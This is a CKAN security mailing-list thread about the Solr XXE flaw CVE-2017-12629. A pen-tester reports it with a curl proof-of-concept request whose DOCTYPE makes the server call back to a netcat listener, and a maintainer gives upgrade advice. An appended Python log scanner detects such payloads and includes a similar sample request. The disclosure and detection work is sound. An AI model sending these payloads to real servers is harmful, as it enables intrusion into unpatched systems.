[CKAN-Security] solr 6.2

Adrià Mercader adria.mercader at okfn.org
Thu Feb 22 09:28:45 UTC 2018

Apologies, I misread the available versions and in fact the upgrade is from
6.2 to 6.6.2.

In any case and given the use CKAN makes of Solr I don't see any potential
issues with the upgrade after going through the changes list:


Hope this helps,


On 22 February 2018 at 09:55, Adrià Mercader <adria.mercader at okfn.org>

> Hi JD,
> Many thanks for the report. We have received reports from this issue and
> are preparing patches and/or updates to help mitigate it. If you are using
> the Docker image included in contrib the easiest fix is just to use the
> solr:6.2.2 image as this one includes the fix for the issue:
> https://lucene.apache.org/solr/news.html#18-october-2017-apache-solrtm-662-available
> It only includes this bug fix so it should not cause any compatibility
> issues.
> We will update the image in contrib asap, and let you know of any
> mitigation steps that we take.
> Best regards,
> Adrià
> On 21 February 2018 at 08:53, JD Bothma <jd at openup.org.za> wrote:
>> Hi
>> We've contracted someone to pen-test data.vulekamali.gov.za who found
>> the following critical vulnerability in CKAN 6.2 as used in the Dockerfile
>> under contrib
>> https://www.cvedetails.com/cve/CVE-2017-12629/
>> https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc
>> We're launching our portal right now so not comfortable upgrading solr
>> just yet, but remapping the xmlparser name to the edismax class has
>> mitigated it for us for now. See
>> https://lucene.apache.org/solr/news.html#12-october-2017-please-secure-your-apache-solr-servers-since-a-zero-day-exploit-has-been-reported-on-a-public-mailing-list
>> I confirmed the vulnerability with the following curl request against a
>> locally-running ckan instance:
>> curl -v localhost/api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D
>> On the IP port 8888 I was running nc -l -p 8888 - when running
>> the request against ckan, I saw a GET request in nc. You can also verify
>> the vulnerability by looking for "Connection Refused" in the error response
>> which shows the server tried to request the DOCTYPE you told it to, and
>> would have executed malicious code you would have served.
>> Best
>> JD
>> _______________________________________________
>> CKAN security
>> https://lists.okfn.org/mailman/listinfo/security
>> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>> Repo: https://github.com/ckan/ckan-security
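The symptoms JD describes (a `{!xmlparser ...}` local-params query with a DOCTYPE pointing at an outside host, and a "Connection Refused" error when the target is unreachable) are easy to look for after the fact in the web server logs in front of CKAN. The following is an added example, not code from the thread, CKAN or Solr: it assumes combined-format access logs (the log lines below are constructed, with documentation-range addresses) and flags `package_search` requests whose parameters select the xmlparser query parser, ranking those that also carry a DOCTYPE or ENTITY declaration highest.

```python
"""Flag Solr xmlparser (XML query parser) abuse in web access logs in front of CKAN.

Added example, not code from the thread, CKAN or Solr. Assumes nginx/Apache
combined log format; the sample lines below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Request line of a combined-format access log entry (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Solr local-params syntax selecting the XML query parser, e.g. {!xmlparser v='...'}
XMLPARSER_RE = re.compile(r'\{!\s*xmlparser\b', re.IGNORECASE)

# Severity order for the classification below.
RANK = {'none': 0, 'xmlparser': 1, 'xxe': 2}


def classify_param(value: str) -> str:
    """Classify one decoded query parameter value.

    'none'      - no xmlparser local params
    'xmlparser' - xmlparser selected (harmless once remapped, still worth noting)
    'xxe'       - xmlparser plus a DOCTYPE/ENTITY declaration, the external-entity shape
    """
    if not XMLPARSER_RE.search(value):
        return 'none'
    lowered = value.lower()
    if '<!doctype' in lowered or '<!entity' in lowered:
        return 'xxe'
    return 'xmlparser'


def scan_line(line: str):
    """Parse one log line; return a dict with the worst classification, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    # parse_qs percent-decodes values, giving the string CKAN forwards to Solr.
    params = parse_qs(parts.query, keep_blank_values=True)
    worst = 'none'
    for values in params.values():
        for v in values:
            level = classify_param(v)
            if RANK[level] > RANK[worst]:
                worst = level
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'path': parts.path,
            'status': m.group('status'), 'level': worst}


def scan_log(text: str):
    """Classify every parseable line of a log."""
    return [r for r in (scan_line(line) for line in text.splitlines()) if r]


def suspicious(text: str):
    """Only the entries that selected the xmlparser query parser."""
    return [r for r in scan_log(text) if r['level'] != 'none']


# Constructed sample log: a normal search, a request shaped like the thread's
# PoC (DOCTYPE pointing at a callback host), and a bare xmlparser query.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2018:08:40:01 +0000] "GET /api/3/action/package_search?q=budget&rows=10 HTTP/1.1" 200 1532 "-" "curl/7.58.0"
203.0.113.7 - - [21/Feb/2018:08:41:13 +0000] "GET /api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F192.0.2.10%3A8888%2Fx%22%3E%3Ca%3E%3C%2Fa%3E%27%7D HTTP/1.1" 500 221 "-" "curl/7.58.0"
203.0.113.9 - - [21/Feb/2018:08:42:00 +0000] "GET /api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3Ca%3E%3C%2Fa%3E%27%7D HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for hit in suspicious(SAMPLE_LOG):
        print(f"{hit['level']:<9} {hit['ip']:<12} {hit['ts']} {hit['path']} -> {hit['status']}")
```

Once solrconfig.xml remaps the xmlparser name to the edismax parser (the Solr news item JD links gives it as `<queryParser name="xmlparser" class="solr.ExtendedDismaxQParserPlugin"/>`), or once Solr is on 6.6.2, `xmlparser`-level hits are expected to be harmless, but they still show who has been probing the endpoint; an `xxe`-level hit with a 500 status on an unpatched instance is the "Connection Refused" case the thread describes and deserves a look at what host the DOCTYPE pointed at.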